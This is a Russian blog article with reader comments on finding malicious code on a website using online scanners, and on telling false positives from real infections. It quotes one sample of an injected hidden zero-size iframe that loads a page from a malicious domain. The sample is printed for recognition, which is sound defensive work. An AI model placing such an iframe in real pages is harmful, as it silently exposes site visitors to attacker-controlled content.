Как найти вредоносный код на сайте.

imegesКак проверить сайт на наличие вредоносного кода.

  Иногда бывает такая ситуация когда нужно проверить сайт на вирусы. Это может понадобится к примеру если вы долгое время ищите в интернете ответ на интересующий вас вопрос и вот в конце концов то нашли но вдруг в поисковике вы натыкаетесь на предупреждение, что сайт может угрожать вашей безопасности. Те кто много проводит времени в интернете понимают о чем я говорю.  Для  остальных я попытаюсь объяснить подробнее, что это может означать.

   И так, все поисковые системы регулярно сканируют и проверяют все сайты на вирусы и вредоносный код. Когда поисковый робот находит такой код на сайте, он автоматически выставляет предупреждение в поиске, что этот сайт может угрожать вашему компьютеру. Но не всегда это соответствует действительности, так как эти роботы могут ошибаться и случается такое, что могут принять даже обычный код, к примеру, социальных кнопок или JavaScript за вредоносный. В такой ситуации возникает естественный вопрос. Стоит ли вообще посещать этот сайт?

  Если есть возможность найти интересующую вас информацию на другом сайте то такой сайт, где есть предупреждение, что он может распространять вредоносный код или вирус, естественно посещать не стоит. Но когда вы долгое время искали очень нужную вам информацию и наконец-то нашли, как быть в таком случае?
   Это с одной стороны, ну а с другой стороны, если вы являетесь владельцем сайта и в один прекрасный солнечный день, в акаунте  яндекса или гугла, вы обнаружите, предупреждение, что на вашем сайте есть вредоносный код? Я думаю такое предупреждение вам настроение не улучшит. И как быть в таком случае, Как найти этот вредоносный код или вирус?  Обычные антивирусные программы вам здесь вряд ли помогут.  Для этого случая есть специальные программы и онлайн сервисы, которые могут сканировать сайт и проверять сайты на вредоносный код. Таких программ и онлайн сервисов в интернете естественно, наверное, очень много. И обо всех я здесь рассказывать не собираюсь, да все я их конечно и не знаю. Я здесь расскажу о некоторых сервисах, о которых я знаю и которыми сам пользовался.
   Если вы вебмастер , то вы можете это сделать через свой акаунт в яндексе, гугле, и т.д. хотя это тоже не всегда помогает. К примеру, так как было у меня. Однажды мне один мой знакомый сообщает, что при заходе на мой сайт его антивирусная утилита сообщает ему, что на моём сайте есть вирус. Я естественно сразу же проверяю по всем акаунтам в поисковых системах, где только зарегистрирован мой сайт. И везде сообщения о том, что на моем сайте вирусов или подозрений на вредоносный код нет.  Получается, что по мнению поисковиков мой сайт чистый и никаких вредоносных программ и вирусов нет. Но ведь антивирусная программа моего знакомого, где то что то нашла. И такая программа установлена наверняка не только у него, но и может быть, так же установлена еще у многих пользователей интернета. И получается, что все у кого установлена такая программа обойдут мой сайт стороной, и не факт, что в последствии, вернутся на этот сайт, после такого предупреждения.
   Тогда я и начал искать различные программы и онлайн сервисы для проверки сайта на вредоносный код. Как я уже писал выше таких сервисов в интернете много но в основном они просто после сканирования показывают информацию о наличии на сайте вредоносного кода. То есть имеется подозрение или нет и всё.  К примеру как этот сервис.

 

  2ip - принцип работы в этом сервисе обычный: прописываем адрес сайта который нужно проверить на наличие вредоносного кода и нажимаем кнопку «Проверить». После проверки вам выдаётся сообщение, были ли обнаружены на сайте вирусы или подозрительные коды. Этот сервис также проверяет, считают ли поисковики Яндекс и Google этот сайт зараженным. Но не всё так просто.

  Как я уже и писал высшее все эти программы и сервисы могут ошибаться, и посчитать подозрительным обычный JavaScript. Поэтому всегда нужно проверить и просмотреть этот код самому. К примеру как в этом случае.

 

imeges

 

Здесь есть подозрение на вирус и написано, что на сайте обнаружены, iframe-вставки. Но если разобраться и посмотреть код страницы то можно понять, что это просто код вставки видео с youtube.

 

imeges

 

  Второй онлайн сервис для проверки сайта на наличие вредоносных программ


   Antivirus Alarm — для сканирования указанного вами сайта сервис использует антивирусные базы от крупнейших мировых антивирусных компаний. Полное сканирование длится  до 10 минут и не останавливается, даже если вы закрываете страницу. Здесь же указывается ссылка, по которой вы сможете посмотреть результаты в любое время. Этот сервис еще хорош тем, что здесь есть список наиболее часто обнаруживаемых вирусов на сайтах. Например, вот так выглядит код вируса iframe asqyt.in:
<iframe src="http://asqyt.in/index.php?tp=544a75b9de10d062" width="0" height="0" frameborder="0"></iframe>
Здесь же есть и список НЕ вирусов. Это позволяет не спешить паниковать, когда одна из  антивирусных программ принимает код за вирус.
К примеру здесь по мнению Google он даже сам себе не доверяет.

(На момент редактирования был недоступен)

 

imeges

 

Еще один сервис для проверки сайта на наличие вредоносного кода.


   Sucuri.net - этот сервис отличается от остальных тем, что он показывает, какой именно файл сайта заражен. Так- же можно посмотреть, какие файлы были просканированы.  Но после проверки так же нужно самому всё просмотреть. К примеру если у кого на сайте установлен код соцыальной кнопки (Одна кнопка.ру) то этот сервис так же посчитает этот код подозрительным.

 

imeges

 

  Поэтому делаем вывод. И моё мнение такое, что все эти сервисы конечно бесспорно полезны и действительно приносят огромную помощь в поиске вредоносного кода на сайте. Но как говорится доверяй но проверяй, так , что каждую информацию выданную этими сервисами нужно проверять самому. И конечно же окончательное действие остаётся только за вами.

 

Комментарии   

 
# Redis 09.04.2013 17:31
Я проверил свой сайт вирусов ненашел а Sucuri.net пишет что сайт в черном списке-???
Ответить | Ответить с цитатой | Цитировать
 
 
# зомби 20.04.2013 06:34
Интересная статья. Как раз столкнулся с проблемой вируса на сайте. Яндекс забанил сайт. Проверил всем чем можно - чисто! Даже не знаю что делать.
Ответить | Ответить с цитатой | Цитировать
 
 
# Админ. 20.04.2013 09:30
Цитирую зомби:
Интересная статья. Как раз столкнулся с проблемой вируса на сайте. Яндекс забанил сайт. Проверил всем чем можно - чисто! Даже не знаю что делать.

У меня тоже один раз была проблема в яндексе, оказалась реклакламный код который был установлен у меня на сайте...
В сообщении о вредоносном коде должен быть фрагмент самого кода который считается вредоносным, и указана страница на которой он находится. Попробуйте найти сам код на этой странице и разобраться, что это...
Если такого нет то можно обратиться в службу поддержки яндекса и узнать какой именно код считается вредоносным....
Ответить | Ответить с цитатой | Цитировать
 
 
# rolfanya 09.07.2013 14:30
у меня не пишется какой вредоносный код, пишет что просто найден, я перепроверил сайт порядка 10 сайтами и ничего не найдено, что делать тоже не знаю. И интересно ещё одно, допустим 7 числа нашли вредоносный код, 7 же вечером я подаю перепроверить 8 его считают опять нормальным без вирусов, а 9 опять банят
Ответить | Ответить с цитатой | Цитировать
 
 
# Админ. 09.07.2013 15:01
Цитирую rolfanya:
у меня не пишется какой вредоносный код, пишет что просто найден, я перепроверил сайт порядка 10 сайтами и ничего не найдено, что делать тоже не знаю. И интересно ещё одно, допустим 7 числа нашли вредоносный код, 7 же вечером я подаю перепроверить 8 его считают опять нормальным без вирусов, а 9 опять банят

Вариантов много может быть. Это может быть просто ошибка, так же если у вас стоит контекстная реклама на сайте то вредоносный код может быть в самой рекламе и не постоянно, а только когда показываются определенные объявления с этим кодом... Так у меня было один раз только антивирус кричал на сайт... Отключил рекламные блоки стало все нормально, потом через определенное время включил. Попробуйте написать в поддержку пусть напишут какой именно код они считают вредоносным....
Ответить | Ответить с цитатой | Цитировать
 
 
# Евгений 05.06.2013 03:42
Спасибо за статью. Хостинг прислал мне письмо, что нагрузка на CPU сильно возросла. Что может быть результатом наличия вредоносного кода на сайте. И действительно с 7.2 cp 2 июня, до 360.58 cp 3 июня - очень подозрительный скачек. Проверка дала отрицательный результат, буду искать другие причины.
Ответить | Ответить с цитатой | Цитировать
 
 
# Ирина 17.10.2013 05:36
Здравствуйте!

Подскажите, пожалуйста, что мне делать.
На мой сайт невозможно зайти из гугла, но из яндекса можно. Мне стали писать мои читатели, что выдает угрожающее предупреждение о вирусной угрозе.
Посетители уходят, мой сайт уже исключили по этой причине из рейтинга тревел блоггеров.
Я зашла в панель гугл вебмастер. Увидела там список примеров URL и нашла чужие, не мои, но ведущие на мой сайт. Написала в Гугл, чтобы их удалили. Прошли сутки, но сайт еще в блокировке.
Я новичок и плохо разбираюсь в этом. Что Вы мне посоветуете еще сделать. Может шаблон поменять? Я увидела, что он до этой блокировки вдруг изменился - вместо "читать далее" стал писать по-английски... Или может партнерскую рекламу убрать? Подскажите, пожалуйста...
Заранее спасибо!

Из Яндекса http://yarovaya-travel.ru/ открывается нормально.

С уважением, Ирина Яровая
Ответить | Ответить с цитатой | Цитировать
 
 
# Админ. 17.10.2013 15:48
Ирина В таком случае могу посоветовать только одно - Искать этот вредоносный код.
Вы можете обратиться в службу поддержки Гугла или яндекса и узнать какой код они считают вредоностым, после этого найти этот код на сайте и удалить.
Или воспользоваться методом "тыка" тоесть поочереди отключать рекламные блоки, банеры и т.д. ... Так же можно попробовать откатить сайт на несколько дней назад, (Востановить из копии кстати копии нужно делать постоянно и желательно сохранять копии не только на сервере но и на компе).
Попробуйте пооуберать рекламу с сайта и разные скрипты поотключать для начала проверьте сайт через разные системы которые находят вредоносные коды. Но в любом случае нужно разбираться отдельно с каждым кодом. Бывают такие ситуации что совершенно безобидный код этими системами принимается как вредоносный. У меня бывало так что ругались на соц. кнопки от яндекса, а был и в рекламе хоть и не вырус но браузер ругался....
Ответить | Ответить с цитатой | Цитировать
 
 
# Roman 22.10.2013 10:49
Не один из сервисов не смог проверить мой сайт. С чем это связано?
Ответить | Ответить с цитатой | Цитировать
 
 
# Олег Цымбал 16.01.2014 15:10
У меня с поисковиками все нормально. Но решил я дать рекламу на свой сайт в Google AdWords. Вот тут и начались проблемы. Первый раз забанили рекламную компанию. Дали список ссылок. Я догадался, что это тизерная реклама. После удаления рекламного блока, показы рекламы возобновились. Сейчас снова забанили - нашли несколько ссылок и вредоносных кодов с сайта "Рунетки". В одном коде было слово "Slideshow". Я понял, что это плагин- слайдер и удалил его. Сейчас снова подал заявление в Google на проверку сайта. Проверял свой сайт плагинами TAC и Exploit Scanner. Первый проблем не обнаружил. А второй обнаружил около 400 вредных ссылок. Но как я понял они не всегда наносят вред сайту, так что неопытному мастеру не разобраться. Проверил также сайт и с помощью онлайн сервисов, что Вы описали в статье. Спасибо! Но проблемы с сайтом не обнаружены. Яндекс и Google вирусов и вредных кодов не видят. Но на сервисе antivirus-alarm .ru увидел, что Google иногда считает опасным даже самого себя. Спасибо!
Ответить | Ответить с цитатой | Цитировать
 
 
# Ирина1980 24.01.2014 19:07
Большое спасибо проверила свой сайт и всё нормально. Буду всегда использовать вашу информацию.
Ответить | Ответить с цитатой | Цитировать
 

Добавить комментарий

В комментариях запрещается:
1) Писать оскорбительные выражения в сторону как администратора, модератора так и других пользователей сайта. (За такое нарушение сразу бан)
2) Реклама в любом ее проявлении, а так же рекламные ссылки на свои сайты, партнерские ссылки, для ссылки на свой сайт нужно использовать специальное поле для добавления ссылки.
3) Прежде чем писать комментарий и задавать вопрос обязательно убедитесь, что на ваш вопрос точно нет ответа на сайте. Так же на сайте есть форум, где вы можете задавать вопросы другим участникам этого форума...
ВНИМАНИЕ: ПРАВИЛА МОГУТ ДОПОЛНЯТЬСЯ И ИСПРАВЛЯТЬСЯ, В ТЕЧЕНИИ ВРЕМЕНИ СУЩЕСТВОВАНИЯ САЙТА БЕЗ ПРЕДУПРЕЖДЕНИЯ. ПОЭТОМУ ЧИТАЙТЕ ИХ ОБЯЗАТЕЛЬНО, ВО ИЗБЕЖАНИЕ НЕДОРАЗУМЕНИЙ.


Защитный код
Обновить

 

 

 

Custom Search

 

 

Читаем так же:

Отправить в FacebookОтправить в Google BookmarksОтправить в TwitterОтправить в LinkedInОтправить в BobrdobrОтправить в LivejournalОтправить в MoymirОтправить в OdnoklassnikiОтправить в VkcomОтправить в Yaru